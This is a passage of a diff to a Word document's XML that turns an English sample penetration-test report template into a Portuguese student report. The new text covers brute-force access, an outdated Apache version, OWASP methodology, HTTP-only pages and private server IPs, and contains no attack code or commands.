+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:u w:color="000000"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t xml:space="preserve"> dentre elas</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:u w:color="000000"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t xml:space="preserve"> patches desatualizados e configurações de segurança deficientes. Durante os testes, os estudantes tiveram acesso de nível administrativo a várias máquinas. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Cambria" w:hAnsi="Roboto Bold" w:cs="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:u w:color="000000"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:u w:color="000000"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:cr/>
+        <w:t xml:space="preserve">Máquina 1 - Acesso obtido através de </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:u w:color="000000"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t>Brute Force</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
           <w:b/>
           <w:bCs/>
@@ -1879,6 +2421,149 @@
         <w:pStyle w:val="Ttulo2"/>
         <w:spacing w:line="240" w:lineRule="auto"/>
         <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:u w:color="000000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="5" w:name="_Toc59959351"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:u w:color="000000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">2.1 </w:t>
+      </w:r>
+      <w:bookmarkStart w:id="6" w:name="_Toc59959352"/>
+      <w:bookmarkEnd w:id="5"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:u w:color="000000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Recomendações</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:hint="eastAsia"/>
+          <w:lang w:val="en-ZA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+          <w:lang w:val="en-ZA"/>
+        </w:rPr>
+        <w:t>Os estudantes recomendam que os desenvolvedores atu</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+          <w:lang w:val="en-ZA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">alizem a versão do Apache, já que a que foi encontrada (Apache/2.4.29) é uma versão considerada desatualizada, já que depois dela foram lançadas mais de 15 versões novas que corrigem falhas </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+          <w:lang w:val="en-ZA"/>
+        </w:rPr>
+        <w:t>que surgiram nessa e nas versões posteriors.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:u w:color="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:u w:color="000000"/>
+          <w:lang w:val="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">3.0 </w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="6"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:u w:color="000000"/>
+        </w:rPr>
+        <w:t>Metodologias</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+        </w:rPr>
+        <w:t>A metodologia usada foi o OWASP, para a consulta do document</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+        </w:rPr>
+        <w:t>o</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Owasp Top 10</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Ttulo2"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
           <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
@@ -1886,7 +2571,7 @@
           <w:u w:color="000000"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc59959351"/>
+      <w:bookmarkStart w:id="7" w:name="_Toc59959353"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
@@ -1894,12 +2579,22 @@
           <w:bCs w:val="0"/>
           <w:color w:val="000000"/>
           <w:u w:color="000000"/>
+          <w:lang w:val="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">3.1 </w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="7"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:u w:color="000000"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>2.1 Sample Report - Recommendations</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="5"/>
+        <w:t>Coleta de Informação</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1914,26 +2609,286 @@
         <w:rPr>
           <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
         </w:rPr>
-        <w:t xml:space="preserve">John recommends patching the vulnerabilities identified during the testing to ensure that an attacker cannot exploit these systems in the future. One thing to remember is that these systems require frequent patching and once patched, should remain on a regular patch program to protect additional vulnerabilities that are discovered </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+        <w:t xml:space="preserve">Os alunos decobriram que o Sistema utiliza de protocolos HTTP, como head e get, </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
         </w:rPr>
-        <w:t>at a later date</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t xml:space="preserve">que não tem a mesma </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
         </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading"/>
+        <w:t>segurança</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+        </w:rPr>
+        <w:t xml:space="preserve">que </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+        </w:rPr>
+        <w:t>n</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>o</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+        </w:rPr>
+        <w:t>protocolo</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> HTTPS.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Além disso, foi descoberto 3 páginas: /go.php, /index.php</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> e /login.php</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>IP</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>’s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> do SERVER</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>192.168.236.130</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>192.168.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>13.128</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> – (ex)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EB17920" wp14:editId="55E23C16">
+            <wp:extent cx="2680855" cy="2718373"/>
+            <wp:effectExtent l="0" t="0" r="5715" b="6350"/>
+            <wp:docPr id="85327988" name="Imagem 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 1"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId9" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2728823" cy="2767012"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E691B1A" wp14:editId="6EAC4F71">
+            <wp:extent cx="3228918" cy="2728365"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1471572262" name="Imagem 2"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 2"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId10" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3268212" cy="2761568"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Ttulo2"/>
         <w:spacing w:line="240" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
@@ -1943,7 +2898,7 @@
           <w:u w:color="000000"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc59959352"/>
+      <w:bookmarkStart w:id="8" w:name="_Toc59959354"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
@@ -1951,10 +2906,12 @@
           <w:bCs w:val="0"/>
           <w:color w:val="000000"/>
           <w:u w:color="000000"/>
-          <w:lang w:val="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">3.0 Sample Report </w:t>
-      </w:r>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">3.2 </w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="8"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
@@ -1962,10 +2919,10 @@
           <w:bCs w:val="0"/>
           <w:color w:val="000000"/>
           <w:u w:color="000000"/>
-        </w:rPr>
-        <w:t>– Methodologies</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="6"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Numeração de Serviço</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1980,183 +2937,13 @@
         <w:rPr>
           <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
         </w:rPr>
-        <w:t>John utilized a widely adopted approach to performing penetration testing that is effective in testing how well the Offensive Security Labs and Exam environments are secure. Below is a breakout of how John was able to identify and exploit the variety of systems and includes all individual vulnerabilities found.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Ttulo2"/>
-        <w:spacing w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc59959353"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">3.1 Sample Report </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>– Information Gathering</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="7"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-        </w:rPr>
-      </w:pPr>
+        <w:t>A fase de enumeração de serviços em um teste de penetração visa identificar quais serviços estão ativos em um sistema. Essa informação é valiosa para um atacante, pois revela detalhes sobre potenciais pontos de ataque. Entender quais aplicativos estão em execução fornece ao invasor informações essenciais antes de iniciar o teste de penetração. Em alguns casos, algumas portas podem não ser listadas</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
         </w:rPr>
-        <w:t>The information gathering portion of a penetration test focuses on identifying the scope of the penetration test. During this penetration test, John was tasked with exploiting the lab and exam network. The specific IP addresses were:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Lab Network</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t>192.168.1.1, 192.168.1.2, 192.168.1.3</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Exam Network</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t>172.16.203.133, 172.16.203.134, 172.16.203.135, 172.16.203.136</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS"/>
-        </w:rPr>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Ttulo2"/>
-        <w:spacing w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc59959354"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>3.2 Sample Report – Service Enumeration</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="8"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t>The service enumeration portion of a penetration test focuses on gathering information about what services are alive on a system or systems. This is valuable for an attacker as it provides detailed information on potential attack vectors into a system. Understanding what applications are running on the system gives an attacker needed information before performing the actual penetration test.  In some cases, some ports may not be listed.</w:t>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -2280,7 +3067,19 @@
               <w:rPr>
                 <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
               </w:rPr>
-              <w:t>192.168.1.1</w:t>
